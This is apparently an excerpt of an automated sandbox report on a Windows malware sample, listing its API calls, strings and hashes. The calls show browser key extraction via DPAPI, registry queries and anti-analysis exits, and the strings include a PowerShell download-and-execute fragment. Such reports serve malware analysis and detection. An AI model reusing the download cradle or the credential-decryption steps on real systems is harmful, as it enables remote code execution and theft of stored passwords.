                                              • LocalAlloc.KERNEL32(00000040,?), ref: 047E9C98
                                              • ReadFile.KERNEL32(000000FF,?,00000000,047E16F6,00000000), ref: 047E9CC1
                                              • LocalFree.KERNEL32(047E16F6), ref: 047E9CF7
                                              • CloseHandle.KERNEL32(000000FF), ref: 047E9D01
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                              • String ID:
                                              • API String ID: 2311089104-0
                                              • Opcode ID: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                              • Instruction ID: e9ea1d560d41f793e3e46c7e6468cb66f449bb3a0a0a47c8a271e23964622150
                                              • Opcode Fuzzy Hash: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                              • Instruction Fuzzy Hash: 023136F9A00209EFDB10DFA5C884BAE77F5FB48304F108258EA05A7390D774AA45CFA1
                                              APIs
                                              • __getptd.LIBCMT ref: 0041C9EA
                                                • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                                • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                              • __amsg_exit.LIBCMT ref: 0041CA0A
                                              • __lock.LIBCMT ref: 0041CA1A
                                              • InterlockedDecrement.KERNEL32(?), ref: 0041CA37
                                              • free.MSVCRT ref: 0041CA4A
                                              • InterlockedIncrement.KERNEL32(0042B558), ref: 0041CA62
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                              • String ID:
                                              • API String ID: 634100517-0
                                              • Opcode ID: e76d0c216dfbc18853365bd0fa83689a94f09e66430c80d3606cd507cbddbdce
                                              • Instruction ID: 7f31c5254ef7052323bd295075bc031dd33fd82d1b7aa06430cf1dcd4438de76
                                              • Opcode Fuzzy Hash: e76d0c216dfbc18853365bd0fa83689a94f09e66430c80d3606cd507cbddbdce
                                              • Instruction Fuzzy Hash: 2C01C431A817299BC722EB669C857DE77A0BF04794F01811BE804A7390C72C69D2CBDD
                                              APIs
                                              • __getptd.LIBCMT ref: 047FCC51
                                                • Part of subcall function 047FC206: __getptd_noexit.LIBCMT ref: 047FC209
                                                • Part of subcall function 047FC206: __amsg_exit.LIBCMT ref: 047FC216
                                              • __amsg_exit.LIBCMT ref: 047FCC71
                                              • __lock.LIBCMT ref: 047FCC81
                                              • InterlockedDecrement.KERNEL32(?), ref: 047FCC9E
                                              • free.MSVCRT ref: 047FCCB1
                                              • InterlockedIncrement.KERNEL32(0042B980), ref: 047FCCC9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                              • String ID:
                                              • API String ID: 634100517-0
                                              • Opcode ID: 8963050db06c82e22f7373581aae20909f3d7bfc4c33c20251b3e0e20ddd7704
                                              • Instruction ID: 0fa0fc4710a39d36be4171d13b91a68744ba9a66705b2b80b7a8b2744ed0a56f
                                              • Opcode Fuzzy Hash: 8963050db06c82e22f7373581aae20909f3d7bfc4c33c20251b3e0e20ddd7704
                                              • Instruction Fuzzy Hash: 1701D231A01A28EFE722AFAA9D4876D7760FF04714F404116DE14A7390E7347485EFD9
                                              APIs
                                              • strlen.MSVCRT ref: 00416F1F
                                              • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041719A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 00416F4D
                                                • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416BE1
                                                • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416C05
                                              • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 00416F92
                                              • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041719A), ref: 004170B3
                                                • Part of subcall function 00416DE0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00416DF8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: strlen$MemoryProcessQueryReadVirtual
                                              • String ID: @
                                              • API String ID: 2950663791-2766056989
                                              • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                              • Instruction ID: da6ee04ed372484ea639f8c5ae6d2cf8ded6d6947598eb42fecba3fc0a9bdd2e
                                              • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                              • Instruction Fuzzy Hash: 27511CB5E041099BDB04CF98D981AEFBBB5FF88304F108559F919A7340D738EA51CBA5
                                              APIs
                                              • strlen.MSVCRT ref: 047F7186
                                              • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,047F7401,00000000,00420BA8,00000000,00000000), ref: 047F71B4
                                                • Part of subcall function 047F6E37: strlen.MSVCRT ref: 047F6E48
                                                • Part of subcall function 047F6E37: strlen.MSVCRT ref: 047F6E6C
                                              • VirtualQueryEx.KERNEL32(047F7574,00000000,?,0000001C), ref: 047F71F9
                                              • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,047F7401), ref: 047F731A
                                                • Part of subcall function 047F7047: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 047F705F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: strlen$MemoryProcessQueryReadVirtual
                                              • String ID: @
                                              • API String ID: 2950663791-2766056989
                                              • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                              • Instruction ID: 0f6cf7d359eb72222e5091499b6a6586046764f12fff64318ba3c1966aab4505
                                              • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                              • Instruction Fuzzy Hash: 3251E6B1E04109EBDB08CF99DD81AEFB7B5BF88300F148529FA15A7340D734AA11CBA5
                                              APIs
                                              • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E2A), ref: 00406A19
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID: *n@$*n@
                                              • API String ID: 1029625771-193229609
                                              • Opcode ID: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                              • Instruction ID: a280f62563b1b8af23ece619f3fba2aedbd92eaccb2561d1aa32790852693925
                                              • Opcode Fuzzy Hash: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                              • Instruction Fuzzy Hash: DA71C874A00119DFCB04CF48C484BEAB7B2FB88315F158179E80AAF391D739AA91CB95
                                              APIs
                                              • lstrcat.KERNEL32(?,0064A30C), ref: 047F4A42
                                                • Part of subcall function 047F9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 047F9072
                                              • lstrcat.KERNEL32(?,00000000), ref: 047F4A68
                                              • lstrcat.KERNEL32(?,?), ref: 047F4A87
                                              • lstrcat.KERNEL32(?,?), ref: 047F4A9B
                                              • lstrcat.KERNEL32(?,0064A284), ref: 047F4AAE
                                              • lstrcat.KERNEL32(?,?), ref: 047F4AC2
                                              • lstrcat.KERNEL32(?,0064A2C8), ref: 047F4AD6
                                                • Part of subcall function 047FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 047FA9EF
                                                • Part of subcall function 047F8FF7: GetFileAttributesA.KERNEL32(00000000,?,047E1DBB,?,?,0042564C,?,?,00420E1F), ref: 047F9006
                                                • Part of subcall function 047F47D7: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 047F47E7
                                                • Part of subcall function 047F47D7: RtlAllocateHeap.NTDLL(00000000), ref: 047F47EE
                                                • Part of subcall function 047F47D7: wsprintfA.USER32 ref: 047F480D
                                                • Part of subcall function 047F47D7: FindFirstFileA.KERNEL32(?,?), ref: 047F4824
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                              • String ID:
                                              • API String ID: 2540262943-0
                                              • Opcode ID: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                              • Instruction ID: 6df74824126fbe3d712737bda82187e8dcfd6ea536ffeb3c10027557209d82ff
                                              • Opcode Fuzzy Hash: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                              • Instruction Fuzzy Hash: 153184BA9402086BDB10FBF0CC88EE9737DAB58704F4045C9A35596280DFB4A7898B95
                                              APIs
                                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                              • ShellExecuteEx.SHELL32(0000003C), ref: 00412D85
                                              Strings
                                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412CC4
                                              • ')", xrefs: 00412CB3
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412D04
                                              • <, xrefs: 00412D39
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              • API String ID: 3031569214-898575020
                                              • Opcode ID: be724a604eb788cc69cb88ea5721ac6dea3b77e10dbfd579f56e69c65ca0a354
                                              • Instruction ID: 8aa8f54ed0a99c91faffa02525c95fa844b6858a6ee3c68abfdd9097d7126834
                                              • Opcode Fuzzy Hash: be724a604eb788cc69cb88ea5721ac6dea3b77e10dbfd579f56e69c65ca0a354
                                              • Instruction Fuzzy Hash: 08410E71D112089ADB14FBA1C991FDDB774AF10314F50401EE016A7192DF786ADBCFA9
                                              APIs
                                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 047E14A5
                                              • __aulldiv.LIBCMT ref: 047E14BF
                                              • __aulldiv.LIBCMT ref: 047E14CD
                                              • ExitProcess.KERNEL32 ref: 047E14FB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                              • String ID: @
                                              • API String ID: 3404098578-2766056989
                                              • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                              • Instruction ID: ec45eb5b5d87f58ec06878b66423bc93c3fb456244b0d0229b935d190556e9fa
                                              • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                              • Instruction Fuzzy Hash: 0601FBB0940308FAEB20DFD1CC8ABADBBB9EB05709F608548E705BA3C0E7B4A545C755
                                              APIs
                                              • memcmp.MSVCRT(?,00421264,00000003), ref: 047EA094
                                                • Part of subcall function 047FAA07: lstrcpy.KERNEL32(?,00000000), ref: 047FAA4D
                                                • Part of subcall function 047F0CC7: memset.MSVCRT ref: 047F0E83
                                                • Part of subcall function 047F0CC7: lstrcat.KERNEL32(?,00000000), ref: 047F0E9C
                                                • Part of subcall function 047F0CC7: lstrcat.KERNEL32(?,00420D7C), ref: 047F0EAE
                                                • Part of subcall function 047F0CC7: lstrcat.KERNEL32(?,00000000), ref: 047F0EC4
                                                • Part of subcall function 047F0CC7: lstrcat.KERNEL32(?,00420D80), ref: 047F0ED6
                                                • Part of subcall function 047FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 047FA9EF
                                              • memcmp.MSVCRT(?,00421114,00000003), ref: 047EA116
                                              • memset.MSVCRT ref: 047EA14F
                                              • LocalAlloc.KERNEL32(00000040,?), ref: 047EA1A8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                              • String ID: @
                                              • API String ID: 1977917189-2766056989
                                              • Opcode ID: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                              • Instruction ID: a0784c59b9fc1a6c9a080f316699951a9e613ba3e9cea8e38d827a6b558f7692
                                              • Opcode Fuzzy Hash: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                              • Instruction Fuzzy Hash: 7D617F30600248DFDB24EFA5CD99FED7775AF58308F408128EA09AB790EB747A09CB41
                                              APIs
                                              • strtok_s.MSVCRT ref: 00410DB8
                                              • strtok_s.MSVCRT ref: 00410EFD
                                                • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,02BE5AC0,?,0042110C,?,00000000), ref: 0041A82B
                                                • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: strtok_s$lstrcpylstrlen
                                              • String ID:
                                              • API String ID: 348468850-0
                                              • Opcode ID: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
                                              • Instruction ID: a77fe6eef144f8be1650d890f93c6b8163d42d0b0f361fe6991083760d0b9acb
                                              • Opcode Fuzzy Hash: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
                                              • Instruction Fuzzy Hash: 91517FB4A40209EFCB08CF95D595AEE77B5FF44308F10805AE802AB351D774EAD1CB95
                                              APIs
                                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                                • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                                • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                                • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                                • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                              • memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                                • Part of subcall function 00409B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                                • Part of subcall function 00409B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                                • Part of subcall function 00409B60: memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                                • Part of subcall function 00409B60: LocalFree.KERNEL32(?), ref: 00409BD3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
                                              • String ID: $"encrypted_key":"$DPAPI
                                              • API String ID: 3731072634-738592651
                                              • Opcode ID: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
                                              • Instruction ID: 5ad523267ed72994677b79ea1d9dce7d7822fbf486e040e59600fa97cf483dfd
                                              • Opcode Fuzzy Hash: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
                                              • Instruction Fuzzy Hash: D53155B5D10109ABCB04EBE4DC85AEF77B8BF44304F14452AE915B7282E7389E04CBA5
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CodeInfoPageValidmemset
                                              • String ID:
                                              • API String ID: 703783727-0
                                              • Opcode ID: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                              • Instruction ID: fac562edc1ba72178b04945d951186a91234b5c20344004ac47f4d18514ee0c6
                                              • Opcode Fuzzy Hash: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                              • Instruction Fuzzy Hash: 1631F831A042999EEB278F75CC94279BFA4BB05314B1841AADA82CF392D228E405D761
                                              APIs
                                              • GetSystemTime.KERNEL32(?), ref: 047F6BD3
                                              • sscanf.NTDLL ref: 047F6C00
                                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 047F6C19
                                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 047F6C27
                                              • ExitProcess.KERNEL32 ref: 047F6C41
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Time$System$File$ExitProcesssscanf
                                              • String ID:
                                              • API String ID: 2533653975-0
                                              • Opcode ID: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                              • Instruction ID: 184f7c074c6d02f7215f15121f89d2726e582a8e68b86cad7759a6af8057cb21
                                              • Opcode Fuzzy Hash: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                              • Instruction Fuzzy Hash: 1C21B7B5D14209ABDB08EFE4D9499EEB7B6FF48300F04852EE516A3250EB346609CB65
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417E37
                                              • HeapAlloc.KERNEL32(00000000), ref: 00417E3E
                                              • RegOpenKeyExA.ADVAPI32(80000002,02BB81F8,00000000,00020119,?), ref: 00417E5E
                                              • RegQueryValueExA.ADVAPI32(?,02BE9EA8,00000000,00000000,000000FF,000000FF), ref: 00417E7F
                                              • RegCloseKey.ADVAPI32(?), ref: 00417E92
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocCloseOpenProcessQueryValue
                                              • String ID:
                                              • API String ID: 3466090806-0
                                              • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                              • Instruction ID: f35b37edc560d93cca1bbeb044924e1a71a0ba88b9c12cde0d27c4035fcf8d53
                                              • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                              • Instruction Fuzzy Hash: 01114CB5A84205FFD710CFD4DD4AFBBBBB9EB09B10F10425AF605A7280D77858018BA6
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 047F809E
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 047F80A5
                                              • RegOpenKeyExA.ADVAPI32(80000002,0064A1D4,00000000,00020119,?), ref: 047F80C5
                                              • RegQueryValueExA.ADVAPI32(?,0064A4EC,00000000,00000000,000000FF,000000FF), ref: 047F80E6
                                              • RegCloseKey.ADVAPI32(?), ref: 047F80F9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                              • String ID:
                                              • API String ID: 3225020163-0
                                              • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                              • Instruction ID: 6be80d00036e04fd70c32b5fadd7fe535d9c6434d9ac7ad76ec1c266fa26bbd5
                                              • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                              • Instruction Fuzzy Hash: 28113DB5A84209BBD710DFD5DD4AFABB7B9EB05710F104219FA15A7280D7B568008BA2
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 047F799B
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 047F79A2
                                              • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,047F7920), ref: 047F79C2
                                              • RegQueryValueExA.ADVAPI32(047F7920,00420AAC,00000000,00000000,?,000000FF), ref: 047F79E1
                                              • RegCloseKey.ADVAPI32(047F7920), ref: 047F79EB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                              • String ID:
                                              • API String ID: 3225020163-0
                                              • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                              • Instruction ID: c52544018d65e81fec58ecc91e29e8769510a8b6ff686027f737f29e7aa3e19d
                                              • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
